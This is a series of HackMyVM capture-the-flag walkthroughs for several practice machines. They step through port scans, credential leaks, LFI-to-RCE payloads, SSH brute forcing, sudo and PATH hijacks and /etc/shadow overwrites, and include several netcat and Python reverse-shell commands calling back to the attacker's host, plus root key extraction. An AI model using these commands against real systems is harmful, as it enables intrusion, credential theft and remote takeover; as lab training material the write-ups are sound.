 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 nop
 pop     rbp
 retn
 ; } // starts at 1135
 main endp

Google exploit of pydoc.

https://bugs.python.org/issue42988

Start doc server.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit
 server>

In another term, we login ssh as user bella, and get the ssh key of root.

 ~ ssh bella@192.168.56.100 -p 5000      
 bella@192.168.56.100's password:
 ...
 Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
 ...
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
 qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
 LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
 ...
 s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
 uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
 -----END OPENSSH PRIVATE KEY-----

Login ssh as root.

 ~ ssh root@192.168.56.100 -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doc
 root@doc:~#

HackMyVm Bah Walkthrough

发表评论

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
 ...

Open port 80 in web browser, it shows qdPM v9.2 login panel. Google that it may leak credentials.

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"


Login 3306, get a url list.

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Make a dic with the url and enum vhost. All urls are OK, but party.bah.hmv returns the minimum size.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv into /etc/hosts, and visit port 80 again, we get a shell interface. Login with the credentials from yml file.

image-20210822104716708.png

This web shell is OK, so we don't need to spawn a reverse shell.

In /home, found another user rocio, escalate to user rocio with password we get from database.

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check pspy. Notice an interesting command of shellinaboxd.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

From the github help of shellinabox, we can know /devel:root:root:/:/tmp/dev means if we visit http://xxxx/devel, we will run /tmp/dev as root.

So we create shell code in /tmp/dev.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

When we visit http://party.bah.hmv/devel/ from web browser, we will get reverse shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Bunny Walkthrough

发表评论

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan dirs.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,4
03,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]


After checking all files, nothing interesting. Next fuzz if index.php get some params.

```bash
 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"

Fuzz local files, but found nothing useful.

~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...

Now we get an php file with LFI, and phpinfo file whose file_uploads is on. It's a famous vulnerability.

Download poc from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify payload code.

      PAYLOAD="""%s\r$                                                                                                                                    
     9 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG$

Run poc, now shell has been uploaded to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80 vim-0 | 0 [13:38:55]
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...


Listen to port 1234 and runs the /tmp/g through LFI.

 ```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'                                                    
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, we found user chris and a file named magic.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$

Check online notes from https://gtfobins.github.io/gtfobins/zip/, we see zip can spawn a shell use the cmd in magic file.

 Shell

 It can be used to break out from restricted environments by spawning an interactive system shell.

     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF

Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
 <h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Create /home/chris/.ssh, upload id_rsa.pub, rename to authorized_keys, chmod 600, then we can get ssh login.

Found writable file.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...


Found /opt/pendu.py which imports random.py.

 ```bash
chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 juil. 31 10:25 .
 drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
 -rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random                    
 ...

Use pspy to check system calls.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py

Write python reverse shell code into random.py, and wait for the final root shell.

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groupes=0(root)
bunny
root@bunny:~#

HackMyVm Zen Walkthrough

发表评论

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From main page, get the app name and version number.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->


Google the zenphoto version 1.5.7, we know it has upload vulnerability.

         Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code

Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/


From robots.txt, found a strange string: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

```bash
 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials. 

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

```bash
enmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p


As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user 

 ```bash
kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen


 We can write to /use/local/bin.

 ```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory


Then we can write a shell code in awk, and get root shell.

 ```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen

HackMyVm Chronos Walkthrough

发表评论

HackMyVm Chronos Walkthrough

The author's writeup is here:https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author use perl to get reverse shell, because the machine blocked many keywords: nc, bash, python, etc.

My way is to use wget to download a php reverse shell.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php

HackMyVm Noob Walkthrough

发表评论

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan dirs. Because too many fake response, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]


Notice the last /nt4sare. Check it.

 ```bash
~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get an user name "adela".

~ curl ht```bash
tp://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null

 ...

From /.ssh, we download id_rsa, and login ssh as user adela.

```bash
 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
 gdev),109(netdev)

The last step is tricky. Enum a lot but still can not find the way to root.

Create a symbolic link to /root/.ssh/id_rsa, then read it through http.

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----

HackMyVm Hundred Walkthrough

发表评论

HackMyVm Hundred Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
 |_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 1
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
 |   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
 |_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Login in ftp anonymous, download all 4 files and check each one.

id_rsa is a fake key. users.txt has a name list. id_rsa.pem looks like a good rsa key.

Scan port 80, only found index.html. Check source code, there is a hint: key. And there may be a secret dir.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->


Download h4ckb1tu5.enc. Google the way to decrypt enc file. Get the dir name.

```bash
 ~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin  
 ~ cat key.bin
 /softyhackb4el7dshelldredd

Scan the dir with common.txt, get id_rsa.

 ~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50  -w /usr/share/dirb/wordlists/common.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /id_rsa               (Status: 200) [Size: 1876]
 /index.html           (Status: 200) [Size: 26]  
 /index.html           (Status: 200) [Size: 26]

Try to login ssh with the username in users.txt downloaded from ftp, in fact, the really username is hvm. But we still need the pass of the key file.

 ~ ssh noname@192.168.56.100 -i id_rsa    
 noname@192.168.56.100's password:

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':

At root folder, we can get a logo.jpg, let's see if something is hidden in it.

 ~ stegseek --crack logo.jpg users.txt
 StegSeek version 0.5
 Progress: 0.00% (0 bytes)          

 [i] --> Found passphrase: "cromiphi"
 [i] Original filename: "toyou.txt"
 [i] Extracting to "logo.jpg.out"

 ~ cat logo.jpg.out                                                                                      
 d4t4s3c#1

Now we can login ssh as hmv.

 ~ ssh hmv@192.168.56.100 -i id_rsa                                                                                                                                                             ssh-0 | 130 [19:12:34]
 Enter passphrase for key 'id_rsa':
 Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
 hmv@hundred:~$ id
 uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found /etc/shadow is writable.

hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /var/www/html/softyhackb4el7dshelldredd/id_rsa
 /etc/shadow
 ...

Create a password hash with word "mypass", and overwrite /etc/shadow. Then we can be root.

 hmv@hundred:/$ openssl passwd mypass
 J9ZxI.ncuCgxs
 hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
 hmv@hundred:/$ su root
 Password:
 root@hundred:/# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hundred
 root@hundred:/#